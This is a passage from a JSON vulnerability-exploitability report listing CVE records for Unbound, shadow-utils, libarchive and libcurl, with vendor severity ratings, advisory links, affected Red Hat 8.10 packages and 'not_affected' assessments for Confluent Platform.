            "name": "redhat"
          },
          "score": 4.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "DISPUTE NOTE: this issue does not pose a security risk as it (according to analysis by the original software developer, NLnet Labs) falls within the expected functionality and security controls of the application. Red Hat has made a claim that there is a security risk within Red Hat products. NLnet Labs has no further information about the claim, and suggests that affected Red Hat customers refer to available Red Hat documentation or support channels. ORIGINAL DESCRIPTION: A heap-buffer-overflow flaw was found in the cfg_mark_ports function within Unbound's config_file.c, which can lead to memory corruption. This issue could allow an attacker with local access to provide specially crafted input, potentially causing the application to crash or allowing arbitrary code execution. This could result in a denial of service or unauthorized actions on the system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-43168"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-43168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303462"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/issues/1039"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/pull/1040"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/pull/1040/files"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00046.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43168"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6998-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-43168"
        }
      ],
      "published": "2024-08-12T13:38:36+00:00",
      "updated": "2026-06-17T07:50:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2024-56433",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1188
      ],
      "description": "shadow-utils (aka shadow) 4.4 through 4.17.0 establishes a default /etc/subuid behavior (e.g., uid 100000 through 165535 for the first user account) that can realistically conflict with the uids of users defined on locally administered networks, potentially leading to account takeover, e.g., by leveraging newuidmap for access to an NFS home directory (or same-host resources in the case of remote logins by these local network users). NOTE: it may also be argued that system administrators should not have assigned uids, within local networks, that are within the range that can occur in /etc/subuid.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-56433"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:20559"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-56433"
        },
        {
          "url": "https://bugzilla.redhat.com/2334165"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2334165"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56433"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-20559.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:20559"
        },
        {
          "url": "https://github.com/shadow-maint/shadow/blob/e2512d5741d4a44bdd81a8c2d0029b6222728cf0/etc/login.defs#L238-L241"
        },
        {
          "url": "https://github.com/shadow-maint/shadow/issues/1157"
        },
        {
          "url": "https://github.com/shadow-maint/shadow/releases/tag/4.4"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-56433.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-20559-0.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56433"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-56433"
        }
      ],
      "published": "2024-12-26T09:15:07+00:00",
      "updated": "2026-06-17T08:12:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:4.6-23.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/shadow-utils@4.6-23.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2024-57970",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        126
      ],
      "description": "libarchive through 3.7.7 has a heap-based buffer over-read in header_gnu_longlink in archive_read_support_format_tar.c via a TAR archive because it mishandles truncation in the middle of a GNU long linkname.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-57970"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:7510"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-57970"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345954"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-57970"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:7510"
        },
        {
          "url": "https://github.com/advisories/GHSA-2q66-6w43-8rm9"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/2415"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2422"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-57970.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-7510.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57970"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-57970"
        }
      ],
      "published": "2025-02-16T04:15:21+00:00",
      "updated": "2026-06-17T08:14:20+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2024-7264",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an\nASN.1 Generalized Time field. If given an syntactically incorrect field, the\nparser might end up using -1 for the length of the *time fraction*, leading to\na `strlen()` getting performed on a pointer to a heap buffer area that is not\n(purposely) null terminated.\n\nThis flaw most likely leads to a crash, but can also lead to heap contents\ngetting returned to the application when\n[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-7264"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/07/31/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-7264"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
